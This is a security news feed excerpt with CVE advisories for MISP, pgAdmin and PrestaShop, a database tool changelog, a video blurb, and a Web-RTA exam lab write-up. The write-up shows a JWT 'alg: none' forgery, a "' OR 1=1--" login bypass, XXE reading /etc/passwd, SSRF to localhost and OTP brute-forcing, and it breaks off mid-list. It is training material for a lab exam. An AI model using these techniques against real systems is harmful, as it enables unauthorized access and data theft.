<title><![CDATA[CVE-2020-28947 | MISP 2.4.134 Template Element ID cross site scripting]]></title>
<description><![CDATA[A vulnerability classified as problematic was found in MISP 2.4.134. The impacted element is an unknown function of the component Template Element Handler. Executing a manipulation of the argument ID can lead to cross site scripting.

This vulnerability is tracked as CVE-2020-28947. The attack ca...]]></description>
<link>https://tsecurity.de/de/3617082/sicherheitsluecken/cve-2020-28947-misp-24134-template-element-id-cross-site-scripting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3617082/sicherheitsluecken/cve-2020-28947-misp-24134-template-element-id-cross-site-scripting/</guid>
<pubDate>Tue, 23 Jun 2026 05:07:39 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> was found in <a href="https://vuldb.com/product/misp">MISP 2.4.134</a>. The impacted element is an unknown function of the component <em>Template Element Handler</em>. Executing a manipulation of the argument <em>ID</em> can lead to cross site scripting.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2020-28947">CVE-2020-28947</a>. The attack can be launched remotely. No exploit exists.

It is advisable to implement a patch to correct this issue.]]></content:encoded>
</item>
<item>
<title><![CDATA[Multiple stored XSS via unprotected back-office template variables p1]]></title>
<description><![CDATA[An attacker who can inject data into the database either through limited back-office access or by chaining an existing vulnerability such as SQL injection can exploit unescaped variables in back-office templates to execute arbitrary JavaScript within an authenticated administrator's session.
The ...]]></description>
<link>https://tsecurity.de/de/3616614/sicherheitsluecken/multiple-stored-xss-via-unprotected-back-office-template-variables-p1/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3616614/sicherheitsluecken/multiple-stored-xss-via-unprotected-back-office-template-variables-p1/</guid>
<pubDate>Mon, 22 Jun 2026 22:51:18 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>An attacker who can inject data into the database either through limited back-office access or by chaining an existing vulnerability such as SQL injection can exploit unescaped variables in back-office templates to execute arbitrary JavaScript within an authenticated administrator's session.
<br>The fix escapes HTML output across dozens of legacy Smarty (.tpl) and modern Twig (.html.twig) back-office templates, including group names, category paths, customer thread and message content, shop names, translation modules, and the admin login page. It also hardens the translation pipeline by introducing a dedicated HTMLPurifier-backed Twig extension (RawPurifiedExtension), wired through TranslationService and the Symfony service container.</p>

    <p>This vulnerability affects the following application versions:</p>
    <ul>
        
            <li>PrestaShop 1.6.0.1</li>
        
            <li>PrestaShop 1.6.0.1 alpha 1</li>
        
            <li>PrestaShop 1.6.0.2</li>
        
            <li>PrestaShop 1.6.0.2 alpha 2</li>
        
            <li>PrestaShop 1.6.0.3</li>
        
            <li>PrestaShop 1.6.0.3 beta 1</li>
        
            <li>PrestaShop 1.6.0.4</li>
        
            <li>PrestaShop 1.6.0.4 RC1</li>
        
            <li>PrestaShop 1.6.0.5</li>
        
            <li>PrestaShop 1.6.0.6</li>
        
            <li>PrestaShop 1.6.0.7</li>
        
            <li>PrestaShop 1.6.0.8</li>
        
            <li>PrestaShop 1.6.0.9</li>
        
            <li>PrestaShop 1.6.0.10</li>
        
            <li>PrestaShop 1.6.0.11</li>
        
            <li>PrestaShop 1.6.0.12</li>
        
            <li>PrestaShop 1.6.0.13</li>
        
            <li>PrestaShop 1.6.0.14</li>
        
            <li>PrestaShop 1.6.1.0</li>
        
            <li>PrestaShop 1.6.1.0 RC4</li>
        
            <li>PrestaShop 1.6.1.0 RC5</li>
        
            <li>PrestaShop 1.6.1.1</li>
        
            <li>PrestaShop 1.6.1.1 RC1</li>
        
            <li>PrestaShop 1.6.1.1 RC2</li>
        
            <li>PrestaShop 1.6.1.2</li>
        
            <li>PrestaShop 1.6.1.2 RC1</li>
        
            <li>PrestaShop 1.6.1.2 RC2</li>
        
            <li>PrestaShop 1.6.1.2 RC3</li>
        
            <li>PrestaShop 1.6.1.2 RC4</li>
        
            <li>PrestaShop 1.6.1.3</li>
        
            <li>PrestaShop 1.6.1.3 RC1</li>
        
            <li>PrestaShop 1.6.1.4</li>
        
            <li>PrestaShop 1.6.1.5</li>
        
            <li>PrestaShop 1.6.1.6</li>
        
            <li>PrestaShop 1.6.1.7</li>
        
            <li>PrestaShop 1.6.1.8</li>
        
            <li>PrestaShop 1.6.1.9</li>
        
            <li>PrestaShop 1.6.1.10</li>
        
            <li>PrestaShop 1.6.1.11</li>
        
            <li>PrestaShop 1.6.1.11 beta 1</li>
        
            <li>PrestaShop 1.6.1.11-beta.1.0</li>
        
            <li>PrestaShop 1.6.1.12</li>
        
            <li>PrestaShop 1.6.1.13</li>
        
            <li>PrestaShop 1.6.1.14</li>
        
            <li>PrestaShop 1.6.1.15</li>
        
            <li>PrestaShop 1.6.1.16</li>
        
            <li>PrestaShop 1.6.1.17</li>
        
            <li>PrestaShop 1.6.1.18</li>
        
            <li>PrestaShop 1.6.1.19</li>
        
            <li>PrestaShop 1.6.1.20</li>
        
            <li>PrestaShop 1.6.1.21</li>
        
            <li>PrestaShop 1.6.1.22</li>
        
            <li>PrestaShop 1.6.1.23</li>
        
            <li>PrestaShop 1.6.1.24</li>
        
            <li>PrestaShop 1.7.0.0</li>
        
            <li>PrestaShop 1.7.0.0 alpha3</li>
        
            <li>PrestaShop 1.7.0.0 alpha4</li>
        
            <li>PrestaShop 1.7.0.0 beta1</li>
        
            <li>PrestaShop 1.7.0.0 beta2</li>
        
            <li>PrestaShop 1.7.0.0 beta3</li>
        
            <li>PrestaShop 1.7.0.0 RC0</li>
        
            <li>PrestaShop 1.7.0.0 RC1</li>
        
            <li>PrestaShop 1.7.0.0 RC2</li>
        
            <li>PrestaShop 1.7.0.0 RC3</li>
        
            <li>PrestaShop 1.7.0.1</li>
        
            <li>PrestaShop 1.7.0.2</li>
        
            <li>PrestaShop 1.7.0.3</li>
        
            <li>PrestaShop 1.7.0.4</li>
        
            <li>PrestaShop 1.7.0.5</li>
        
            <li>PrestaShop 1.7.0.6</li>
        
            <li>PrestaShop 1.7.1.0</li>
        
            <li>PrestaShop 1.7.1.0 beta1</li>
        
            <li>PrestaShop 1.7.1.1</li>
        
            <li>PrestaShop 1.7.1.2</li>
        
            <li>PrestaShop 1.7.2.0</li>
        
            <li>PrestaShop 1.7.2.0 RC 1</li>
        
            <li>PrestaShop 1.7.2.0-RC.1.0</li>
        
            <li>PrestaShop 1.7.2.1</li>
        
            <li>PrestaShop 1.7.2.2</li>
        
            <li>PrestaShop 1.7.2.3</li>
        
            <li>PrestaShop 1.7.2.4</li>
        
            <li>PrestaShop 1.7.2.5</li>
        
            <li>PrestaShop 1.7.3.0</li>
        
            <li>PrestaShop 1.7.3.0 beta 1</li>
        
            <li>PrestaShop 1.7.3.0 RC 1</li>
        
            <li>PrestaShop 1.7.3.1</li>
        
            <li>PrestaShop 1.7.3.2</li>
        
            <li>PrestaShop 1.7.3.3</li>
        
            <li>PrestaShop 1.7.3.4</li>
        
            <li>PrestaShop 1.7.4.0</li>
        
            <li>PrestaShop 1.7.4.0 beta 1</li>
        
            <li>PrestaShop 1.7.4.1</li>
        
            <li>PrestaShop 1.7.4.2</li>
        
            <li>PrestaShop 1.7.4.3</li>
        
            <li>PrestaShop 1.7.4.4</li>
        
            <li>PrestaShop 1.7.5.0</li>
        
            <li>PrestaShop 1.7.5.0 beta 1</li>
        
            <li>PrestaShop 1.7.5.0 RC 1</li>
        
            <li>PrestaShop 1.7.5.0-beta.1</li>
        
            <li>PrestaShop 1.7.5.0-RC.1</li>
        
            <li>PrestaShop 1.7.5.1</li>
        
            <li>PrestaShop 1.7.5.2</li>
        
            <li>PrestaShop 1.7.6.0</li>
        
            <li>PrestaShop 1.7.6.0 beta 1</li>
        
            <li>PrestaShop 1.7.6.0 RC 1</li>
        
            <li>PrestaShop 1.7.6.0 RC 2</li>
        
            <li>PrestaShop 1.7.6.0-beta.1</li>
        
            <li>PrestaShop 1.7.6.0-RC.1</li>
        
            <li>PrestaShop 1.7.6.0-RC.2</li>
        
            <li>PrestaShop 1.7.6.1</li>
        
            <li>PrestaShop 1.7.6.2</li>
        
            <li>PrestaShop 1.7.6.3</li>
        
            <li>PrestaShop 1.7.6.4</li>
        
            <li>PrestaShop 1.7.6.4  1</li>
        
            <li>PrestaShop 1.7.6.5</li>
        
            <li>PrestaShop 1.7.6.5  1</li>
        
            <li>PrestaShop 1.7.6.6</li>
        
            <li>PrestaShop 1.7.6.7</li>
        
            <li>PrestaShop 1.7.6.8</li>
        
            <li>PrestaShop 1.7.6.9</li>
        
            <li>PrestaShop 1.7.7.0</li>
        
            <li>PrestaShop 1.7.7.0 beta 1</li>
        
            <li>PrestaShop 1.7.7.0 beta 2</li>
        
            <li>PrestaShop 1.7.7.0 RC 1</li>
        
            <li>PrestaShop 1.7.7.0-beta.1</li>
        
            <li>PrestaShop 1.7.7.0-beta.2</li>
        
            <li>PrestaShop 1.7.7.0-RC.1</li>
        
            <li>PrestaShop 1.7.7.1</li>
        
            <li>PrestaShop 1.7.7.2</li>
        
            <li>PrestaShop 1.7.7.3</li>
        
            <li>PrestaShop 1.7.7.4</li>
        
            <li>PrestaShop 1.7.7.5</li>
        
            <li>PrestaShop 1.7.7.6</li>
        
            <li>PrestaShop 1.7.7.7</li>
        
            <li>PrestaShop 1.7.7.8</li>
        
            <li>PrestaShop 1.7.7.8  1</li>
        
            <li>PrestaShop 1.7.8.0</li>
        
            <li>PrestaShop 1.7.8.0 beta 1</li>
        
            <li>PrestaShop 1.7.8.0  1</li>
        
            <li>PrestaShop 1.7.8.0 RC 1</li>
        
            <li>PrestaShop 1.7.8.0-beta.1</li>
        
            <li>PrestaShop 1.7.8.0-RC.1</li>
        
            <li>PrestaShop 1.7.8.1</li>
        
            <li>PrestaShop 1.7.8.2</li>
        
            <li>PrestaShop 1.7.8.2  1</li>
        
            <li>PrestaShop 1.7.8.3</li>
        
            <li>PrestaShop 1.7.8.4</li>
        
            <li>PrestaShop 1.7.8.5</li>
        
            <li>PrestaShop 1.7.8.6</li>
        
            <li>PrestaShop 1.7.8.7</li>
        
            <li>PrestaShop 1.7.8.7  1</li>
        
            <li>PrestaShop 1.7.8.8</li>
        
            <li>PrestaShop 1.7.8.9</li>
        
            <li>PrestaShop 1.7.8.10</li>
        
            <li>PrestaShop 1.7.8.11</li>
        
            <li>PrestaShop 8.0.0</li>
        
            <li>PrestaShop 8.0.1</li>
        
            <li>PrestaShop 8.0.2</li>
        
            <li>PrestaShop 8.0.3</li>
        
            <li>PrestaShop 8.0.4</li>
        
            <li>PrestaShop 8.0.5</li>
        
            <li>PrestaShop 8.1.0</li>
        
            <li>PrestaShop 8.1.1</li>
        
            <li>PrestaShop 8.1.2</li>
        
            <li>PrestaShop 8.1.3</li>
        
            <li>PrestaShop 8.1.4</li>
        
            <li>PrestaShop 8.1.5</li>
        
            <li>PrestaShop 8.1.6</li>
        
            <li>PrestaShop 8.1.7</li>
        
            <li>PrestaShop 8.2.0</li>
        
            <li>PrestaShop 8.2.1</li>
        
            <li>PrestaShop 8.2.2</li>
        
            <li>PrestaShop 8.2.3</li>
        
            <li>PrestaShop 8.2.4</li>
        
            <li>PrestaShop 9.0.0</li>
        
            <li>PrestaShop 9.0.0-1.0-RC.1</li>
        
            <li>PrestaShop 9.0.1</li>
        
            <li>PrestaShop 9.0.1-1.0</li>
        
            <li>PrestaShop 9.0.2</li>
        
            <li>PrestaShop 9.0.2-2.0</li>
        
            <li>PrestaShop 9.0.3</li>
        
            <li>PrestaShop 9.0.3-3.0</li>
        
            <li>PrestaShop 9.1.0-3.0-beta.1</li>
        
    </ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[26.1.1]]></title>
<description><![CDATA[- SQL Editor:
                - Fixed autocomplete after SELECT with table with alias
                - Fixed column highlighting with typecasts
                - Fixed single/multiple tab mode toggle state when several editors are opened
                - Fixed an issue where SQL templates showe...]]></description>
<link>https://tsecurity.de/de/3613983/downloads/2611/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3613983/downloads/2611/</guid>
<pubDate>Sun, 21 Jun 2026 20:32:06 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="            - SQL Editor:
                - Fixed autocomplete after SELECT with table with alias
                - Fixed column highlighting with typecasts
                - Fixed single/multiple tab mode toggle state when several editors are opened
                - Fixed an issue where SQL templates showed an incorrect list of columns
                - Disabled spell checking for annotations
                - Added autocomplete suggestions for dialect-specific global variables, such as SYSDATE, SYSTIMESTAMP, current_date, and current_timestamp (thanks to @alonfaraj)
            - AI Assistant: Fixed prompt of AI command results
            - Data Editor:
                - Added the ability to save the current filter as the default and reset it
                - Fixed total row count calculation in the toolbar (thanks to @odegroot1234)
            - Data Transfer:
                - Fixed CSV import with multi-character delimiters, quotes, and escape values
                - Added XML escaping for JSON and JSONB columns when exporting data to DBUnit format
            - Database Tasks: Fixed task failures when using newly created or recreated database objects
            - Navigator:
                - Fixed schema filter dialog opening in Simple view mode(thanks to @xingxing21)
                - Fixed the delete objects dialog layout for large database selections
            - New driver: Added connector for Apache Doris(thanks to @xylaaaaa)
            - Security:
                - Fixed the high vulnerability (CVE-2026-44249) in the netty-handler library. The netty-bom library was updated to version 4.2.15.
            - General:
                - Application was migrated to Eclipse 2026-05
                - Tycho library was updated to version 5.0.3
            - Databases:
                - CockroachDB: Fixed SSL connection issues
                - CUBRID: Fixed table list opening when connecting with a generic JDBC driver (thanks to @Srltas)
                - Databricks driver was updated to version 3.4.1
                - Firebird: Fixed SQL injection vulnerabilities (thanks to @fdcastel)
                - Oracle:
                    - Added an option to show column comments in the data grid (thanks to @EastLord)
                    - Fixed the ability to CREATE VIEW statements ending with CASE...END (thanks to @a3894281)
                    - Added details into NO_DATA_FOUND error message (thanks to @mgustimz)
                - Redshift: Improved performance for queries with many columns by reducing unnecessary metadata calls during result set loading
                - Snowflake: Fixed an issue where the connection failed due to an incorrect URL template
            - Localization:
                - German localization was improved (thanks to @polluks)
                - Fixed pluralization in the auto-refresh interval label in the Data Editor (thanks to @Jashan66)"><pre class="notranslate"><code>            - SQL Editor:
                - Fixed autocomplete after SELECT with table with alias
                - Fixed column highlighting with typecasts
                - Fixed single/multiple tab mode toggle state when several editors are opened
                - Fixed an issue where SQL templates showed an incorrect list of columns
                - Disabled spell checking for annotations
                - Added autocomplete suggestions for dialect-specific global variables, such as SYSDATE, SYSTIMESTAMP, current_date, and current_timestamp (thanks to @alonfaraj)
            - AI Assistant: Fixed prompt of AI command results
            - Data Editor:
                - Added the ability to save the current filter as the default and reset it
                - Fixed total row count calculation in the toolbar (thanks to @odegroot1234)
            - Data Transfer:
                - Fixed CSV import with multi-character delimiters, quotes, and escape values
                - Added XML escaping for JSON and JSONB columns when exporting data to DBUnit format
            - Database Tasks: Fixed task failures when using newly created or recreated database objects
            - Navigator:
                - Fixed schema filter dialog opening in Simple view mode(thanks to @xingxing21)
                - Fixed the delete objects dialog layout for large database selections
            - New driver: Added connector for Apache Doris(thanks to @xylaaaaa)
            - Security:
                - Fixed the high vulnerability (CVE-2026-44249) in the netty-handler library. The netty-bom library was updated to version 4.2.15.
            - General:
                - Application was migrated to Eclipse 2026-05
                - Tycho library was updated to version 5.0.3
            - Databases:
                - CockroachDB: Fixed SSL connection issues
                - CUBRID: Fixed table list opening when connecting with a generic JDBC driver (thanks to @Srltas)
                - Databricks driver was updated to version 3.4.1
                - Firebird: Fixed SQL injection vulnerabilities (thanks to @fdcastel)
                - Oracle:
                    - Added an option to show column comments in the data grid (thanks to @EastLord)
                    - Fixed the ability to CREATE VIEW statements ending with CASE...END (thanks to @a3894281)
                    - Added details into NO_DATA_FOUND error message (thanks to @mgustimz)
                - Redshift: Improved performance for queries with many columns by reducing unnecessary metadata calls during result set loading
                - Snowflake: Fixed an issue where the connection failed due to an incorrect URL template
            - Localization:
                - German localization was improved (thanks to @polluks)
                - Fixed pluralization in the auto-refresh interval label in the Data Editor (thanks to @Jashan66)
</code></pre></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-12044 | pgAdmin 4 up to 9.15 Jinja Template sql injection (Issue 10078 / WID-SEC-2026-2005)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in pgAdmin 4 up to 9.15. The affected element is an unknown function of the component Jinja Template Handler. Such manipulation leads to sql injection.

This vulnerability is referenced as CVE-2026-12044. It is possible to launch the at...]]></description>
<link>https://tsecurity.de/de/3611773/sicherheitsluecken/cve-2026-12044-pgadmin-4-up-to-915-jinja-template-sql-injection-issue-10078-wid-sec-2026-2005/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3611773/sicherheitsluecken/cve-2026-12044-pgadmin-4-up-to-915-jinja-template-sql-injection-issue-10078-wid-sec-2026-2005/</guid>
<pubDate>Sat, 20 Jun 2026 08:24:18 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, was found in <a href="https://vuldb.com/product/pgadmin_4">pgAdmin 4 up to 9.15</a>. The affected element is an unknown function of the component <em>Jinja Template Handler</em>. Such manipulation leads to sql injection.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2026-12044">CVE-2026-12044</a>. It is possible to launch the attack remotely. No exploit is available.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Soft Skills for the Job Market: Resume Writing]]></title>
<description><![CDATA[Author: The Cyber Mentor - Bewertung: 8x - Views:61 https://www.tcm.rocks/ss-y - Find the full and FREE Soft Skills for the Job Market course in the TCM Security Academy. It's one of the several courses featured in our free tier. 

https://www.tcm.rocks/acad-summer-y - We're hosting our annual Su...]]></description>
<link>https://tsecurity.de/de/3610917/it-security-video/soft-skills-for-the-job-market-resume-writing/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610917/it-security-video/soft-skills-for-the-job-market-resume-writing/</guid>
<pubDate>Fri, 19 Jun 2026 18:18:20 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: The Cyber Mentor - Bewertung: 8x - Views:61 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/glrv4p-NvUw?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>https://www.tcm.rocks/ss-y - Find the full and FREE Soft Skills for the Job Market course in the TCM Security Academy. It's one of the several courses featured in our free tier. <br />
<br />
https://www.tcm.rocks/acad-summer-y - We're hosting our annual Summer Sale this month! Up until June 15th, grab 50% off your first membership to the TCM Security Academy (use the code CAMPTCM to redeem) and 20% off certifications and live trainings. <br />
<br />
We're releasing our Soft Skills for the Job Market course all FREE on YouTube! This course can also be found in the TCM Security Academy. <br />
<br />
Module Two of the Soft Skills course covers resume writing - which can be tedious and frustrating, but there are some ways you can craft a polished resume that will help you get noticed by hiring managers and recruiters. 🔥<br />
<br />
Get a copy of the TCM Security resume template here to help you in your job searching journey: https://www.tcm.rocks/resume-template <br />
<br />
More modules will be dripped out here in the near future! Comment below and let us know your thoughts on what the most underrated soft skill is.<br />
<br />
Attending #DEFCON this summer? Make sure you drop by Noob Village to get your resume professionally reviewed and attend a talk on resume best practices from a member of the TCM Security team!<br />
<br />
#resume #resumetemplate #resumetips #softskills #freecourse <br />
<br />
Sponsor a Video: https://www.tcm.rocks/Sponsors<br />
Pentests & Security Consulting: https://tcm-sec.com<br />
Get Trained: https://www.tcm.rocks/acad-y<br />
Get Certified: http://www.tcm.rocks/certs-y<br />
Merch: https://www.bonfire.com/store/tcm-security/<br />
<br />
📱Social Media📱<br />
___________________________________________<br />
X: https://x.com/TCMSecurity<br />
Twitch: https://www.twitch.tv/thecybermentor<br />
Instagram: https://www.instagram.com/tcmsecurity/<br />
LinkedIn: https://www.linkedin.com/company/tcm-security-inc/<br />
TikTok: https://www.tiktok.com/@tcmsecurity<br />
Discord: https://discord.gg/tcm<br />
Facebook: https://www.facebook.com/tcmsecure<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Web-RTA Exam Writeup — Passed | CyberWarFare Labs]]></title>
<description><![CDATA[Certification: Web-RTA (Web Red Team Analyst)Issued by: CyberWarFare Labs (CWL)Difficulty: Beginner–IntermediateFormat: Practical, black-box, 16 flags across 2 web applicationsAuthor: Shikhali JamalzadeIntroductionThe Web-RTA (Web Red Team Analyst) certification by CyberWarFare Labs is a fully ha...]]></description>
<link>https://tsecurity.de/de/3610157/hacking/web-rta-exam-writeup-passed-cyberwarfare-labs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610157/hacking/web-rta-exam-writeup-passed-cyberwarfare-labs/</guid>
<pubDate>Fri, 19 Jun 2026 13:09:28 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*qHO49GjzLkRCKuvKjxQ2kw.png"></figure><h4><strong>Certification:</strong> Web-RTA (Web Red Team Analyst)<br><strong>Issued by:</strong> CyberWarFare Labs (CWL)<br><strong>Difficulty:</strong> Beginner–Intermediate<br><strong>Format:</strong> Practical, black-box, 16 flags across 2 web applications<br><strong>Author:</strong> <a href="https://medium.com/u/20557ba7487d">Shikhali Jamalzade</a></h4><h3>Introduction</h3><p>The Web-RTA (Web Red Team Analyst) certification by CyberWarFare Labs is a fully hands-on, black-box web application penetration testing exam. No multiple choice, no theory — just two live web applications and 16 flags to capture.</p><p>The exam covers real-world web vulnerabilities: JWT attacks, SQL injection, XXE, SSRF, OAuth misconfigurations, and brute force. If you’ve worked through OWASP Top 10 and done some CTF-style web challenges, you’ll recognize the patterns immediately.</p><p>This writeup documents the complete attack chain I used to pass — step by step, flag by flag.</p><blockquote><em>⚠️ </em><strong><em>Disclaimer:</em></strong><em> This writeup is published after passing the exam. Exact flag values and credentials are not disclosed in full. The methodology is shared for educational purposes, as is standard practice in the security community.</em></blockquote><h3>Exam Structure</h3><ul><li>2 web application targets (separate IPs and ports)</li><li>16 total flags — mix of research questions and practical exploitation</li><li>30 days of lab access</li><li>Not proctored</li></ul><p>The first 4 flags are research-based (vulnerability names). The remaining 12 are practical — you earn them by actually exploiting the applications.</p><h3>Research Flags (Questions 1–4)</h3><p>Before touching either application, the exam starts with 4 vulnerability knowledge questions. These are straightforward if your web security fundamentals are solid:</p><ol><li><strong>Vulnerability that executes malicious queries in databases</strong> → SQLi</li><li><strong>Vulnerability that accesses other users’ data via manipulated object identifiers</strong> → IDOR</li><li><strong>Vulnerability that tricks a web app into making requests to internal/external resources</strong> → SSRF</li><li><strong>Vulnerability that injects malicious payloads into server-side templates to execute code</strong> → SSTI</li></ol><h3>WebApp 01</h3><h3>Reconnaissance</h3><p>Starting with the provided IP, the first step is directory enumeration:</p><p>bash</p><pre>feroxbuster -u http://&lt;WEBAPP01_IP&gt;:&lt;PORT&gt; -w /usr/share/wordlists/dirb/common.txt</pre><p>The root page redirects to a login page. Note the URL structure — the /dashboard endpoint will matter shortly.</p><h3>Flag 5 — Anonymous User Role</h3><p>Navigating to the login page, there’s a CAPTCHA + username/password form. Skip trying to brute force it for now.</p><p>Instead, go directly to /dashboard without logging in. The application loads and reveals your current role in the UI:</p><ul><li><strong>Flag 5:</strong> The role allocated to unauthenticated users → anonymous</li><li><strong>Flag 6:</strong> The endpoint where events are available → /dashboard</li></ul><h3>JWT Token Manipulation</h3><p>While on the dashboard as an anonymous user, open Burp Suite and inspect the cookies. There’s an access_token_cookie - paste it into jwt.io.</p><p>The decoded payload reveals:</p><p>json</p><pre>{<br>  "role": "anonymous",<br>  "username": "anonymous"<br>}</pre><p>The token uses algorithm: none - meaning there's no signature verification. This is a classic JWT vulnerability.</p><p>Modify the payload:</p><p>json</p><pre>{<br>  "role": "user",<br>  "username": "user"<br>}</pre><p>Remove the signature entirely (keep the trailing dot), update the cookie in your browser (Storage tab in DevTools or via Burp), and reload the page.</p><p>You’re now authenticated as a user-role account. The dashboard now shows an event:</p><h3>Flag 7 — Event Name</h3><p>The event visible to authenticated users:</p><ul><li><strong>Flag 7:</strong> Masquerade Ball</li></ul><h3>Flag 8 — Admin Username Discovery</h3><p>The event details show it was created by a specific user. That username is:</p><ul><li><strong>Flag 8:</strong> notatypicalsysadmin</li></ul><h3>SQL Injection — Admin Login Bypass</h3><p>Log out and return to the login page. Enter notatypicalsysadmin as the username. Leave the password empty for now - but fill in the CAPTCHA correctly first.</p><p><strong>Key insight:</strong> The application validates the CAPTCHA before checking credentials. If the CAPTCHA is correct, the response will confirm whether the username exists. This is an information disclosure vulnerability that lets you enumerate valid usernames.</p><p>Once you’ve confirmed the username is valid, exploit the SQL injection:</p><ul><li><strong>Flag 10:</strong> The value of the flag in WebApp 01 → flag (the username found in /etc/passwd)</li></ul><h3>Flags 11, 12 &amp; 13 — SSRF via Check Outage</h3><p>Click <strong>Check Outage → Check Our Status</strong>. The application makes an internal request and returns service health data. Observing the response, it’s hitting:</p><ul><li><strong>Flag 11:</strong> Internal URL for fetching secrets → <a href="http://127.0.0.1:8000/health">http://127.0.0.1:8000/health</a></li></ul><p>Now scroll down to the <strong>Fetch Status</strong> section. There’s a “Service URL” input field and a <strong>Fetch Secret</strong> button — a classic SSRF endpoint.</p><p><strong>Step 1:</strong> Enter http://127.0.0.1:8000 and submit. The server returns a 418 status code (I'm a teapot) - the service is alive but rejects plain requests.</p><p><strong>Step 2:</strong> URL-encode the target URL and resubmit:</p><pre>http%3A%2F%2F127.0.0.1%3A8000</pre><p>This time the server returns an encoded response with the label “hidden in layers”.</p><ul><li><strong>Flag 12:</strong> The encoded data returned → a hex-encoded Base64 string</li></ul><p><strong>Step 3:</strong> Decode it — it’s hex that, when decoded, gives Base64. Decode the Base64:</p><p>bash</p><pre>echo "&lt;hex_string&gt;" | xxd -r -p | base64 -d</pre><p>The final decoded output contains credentials: a username and password.</p><ul><li><strong>Flag 13:</strong> The plaintext version of “hidden in layers” → the decoded credentials (username:password pair)</li></ul><h3>WebApp 02</h3><h3>Reconnaissance</h3><p>Using the second IP provided, navigating to the root returns a 404. Time to enumerate:</p><p>bash</p><pre>feroxbuster -u http://&lt;WEBAPP02_IP&gt;:&lt;PORT&gt; -w /usr/share/wordlists/dirb/common.txt</pre><h3>Flag 14 — Login Endpoint Discovery</h3><p>Directory fuzzing reveals a non-standard login path:</p><ul><li><strong>Flag 14:</strong> WebApp 02 login endpoint → /client/login</li></ul><h3>Flag 15 — Client ID (IDOR)</h3><p>Use the credentials extracted from WebApp 01’s SSRF exploitation (the “hidden in layers” plaintext) to log into /client/login.</p><p>You’re now logged in as a client account. The application displays your Client ID:</p><ul><li><strong>Flag 15:</strong> Client ID allocated to the exfiltrated credentials → client_1337</li></ul><h3>OAuth Scope Manipulation + OTP Brute Force</h3><p>After logging in, explore the available permissions/scopes. Attempting to access elevated features returns a permission error. Intercept the authorization request in Burp Suite.</p><p>In the request, find the scope parameter - currently set to read. Change it to admin:</p><pre>scope=admin</pre><p>Forward the modified request. The application now shows admin-level scope — but requires an OTP (One-Time Password) to confirm the privilege escalation.</p><p><strong>The vulnerability:</strong> The application sends the same OTP code every time, making it trivially brute-forceable.</p><p>Send the OTP request to Burp Intruder:</p><ol><li>Mark the OTP field as the payload position</li><li>Set payload type: <strong>Numbers</strong></li><li>Range: 100–999 (3-digit OTP)</li><li>Start attack</li></ol><p>The correct OTP is identified by a different response (redirect or 200 instead of error). In the exam environment, the OTP was 176 - but this may vary per lab instance.</p><p>Once the OTP is confirmed:</p><ol><li>Copy the correct OTP</li><li>Go back to the application (not Burp)</li><li>Enter the OTP in the UI</li><li>Follow the redirect → Admin Dashboard</li></ol><p>Click <strong>Go to Admin Panel</strong>.</p><h3>Flag 16 — Bob’s Credit Card Number</h3><p>The admin panel contains sensitive user data. Navigating through the admin interface reveals a user named Bob with his financial information exposed:</p><ul><li><strong>Flag 16:</strong> Bob’s Credit Card number → <em>(found in admin panel user data)</em></li></ul><h3>Attack Chain Summary</h3><p><strong>WebApp 01</strong></p><pre>[Feroxbuster] → found /dashboard, /login<br>      ↓<br>[Anonymous dashboard] → role = "anonymous" (Flag 5)<br>                      → endpoint = /dashboard (Flag 6)<br>      ↓<br>[JWT cookie] → algorithm: none → change role to "user"<br>      ↓<br>[Authenticated dashboard] → event: "Masquerade Ball" (Flag 7)<br>                          → created by: notatypicalsysadmin (Flag 8)<br>      ↓<br>[Login page] → SQLi: notatypicalsysadmin' / ' OR 1=1-- → admin access<br>      ↓<br>[Update Event] → XXE → /etc/passwd → user "flag" (Flag 9, 10)<br>      ↓<br>[Check Outage] → internal URL: http://127.0.0.1:8000/health (Flag 11)<br>      ↓<br>[Fetch Status] → SSRF → URL encode → hex+Base64 response (Flag 12)<br>             → decode → plaintext credentials (Flag 13)</pre><p><strong>WebApp 02</strong></p><pre>[Feroxbuster] → /client/login (Flag 14)<br>      ↓<br>[Login] with SSRF creds → client_1337 (Flag 15)<br>      ↓<br>[OAuth scope] → change read → admin → OTP required<br>      ↓<br>[Burp Intruder] → brute force OTP → 176 → admin dashboard<br>      ↓<br>[Admin panel] → Bob's credit card number (Flag 16) ✅</pre><h3>All 16 Flags — Quick Reference</h3><ol><li><strong>DB query vulnerability</strong> → SQLi</li><li><strong>Object ID manipulation vulnerability</strong> → IDOR</li><li><strong>Internal request forgery vulnerability</strong> → SSRF</li><li><strong>Server-side template injection</strong> → 